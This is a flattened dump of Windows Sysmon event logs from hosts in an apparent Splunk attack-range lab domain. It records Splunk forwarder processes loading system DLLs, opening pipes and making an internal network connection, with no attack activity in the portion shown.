19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001606384Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001606383Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x80000000000000001606382Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606381Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001606380Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001606379Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001606378Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2trueSplunk, Inc.Valid 10341000x80000000000000001606377Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.247{21761711-83AC-607D-0500-00000000BB01}412976C:\Windows\system32\csrss.exe{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001606376Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.247{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001606375Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.248{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001606374Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.247{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606373Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:32.247{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606372Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.247{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606371Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:32.247{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606370Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.247{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606369Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:32.247{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 10341000x80000000000000001095247Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:32.512{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095246Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:32.512{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095245Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:32.163{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED96DFB26DAFD8733B4592BA7A053BC9,SHA256=AC9F4BE67FF555145DC8C7A520546D97D778A86A6B2BDB276A9BA022C58C8F87,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606549Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.951{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606548Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.951{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18393D43D282544DD7B93869697584F2,SHA256=55D1B96D6D384FE764CBA6FE9C0A6667DF9B620A60244C039AB5D2E6BFE611ECfalsefalse - insufficient disk space 11241100x80000000000000001606547Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.936{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606546Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.936{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5323624345BC5F68A46D36BAC4B3E4A8,SHA256=33E3728A3B5A2C26C8362F41482523FB8B18E39CF8987A2C2558F8583A7AAD5Ffalsefalse - insufficient disk space 11241100x80000000000000001606545Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.920{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606544Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.920{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEE02FECFA191AC4324843869B9AFDBB,SHA256=18EBEF24268C7195AD455405E182C9A32D71A5F53BD68E5D1F9D54DF818F1CFEfalsefalse - insufficient disk space 354300x80000000000000001606543Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.782{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49733-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 534500x80000000000000001606542Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.782{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001606541Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.782{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x80000000000000001606540Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.782{21761711-7A89-6080-C860-00000000BB01}51526704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606539Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.782{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001606538Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.782{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 23542300x80000000000000001095252Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:33.596{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6960083AEBAB053DA5714C3BF5589A0,SHA256=6EF56593E7B5D67A7091DD907B668A615E9F345CEAC0F2F0D86DF78E350C5AAB,IMPHASH=00000000000000000000000000000000falsetrue 734700x80000000000000001606537Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.666{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001606536Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001606535Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001606534Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001606533Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001606532Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001606531Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001606530Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001606529Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001606528Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001606527Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001606526Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001606525Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001606524Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001606523Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001606522Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001606521Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001606520Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001606519Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001606518Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001606517Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 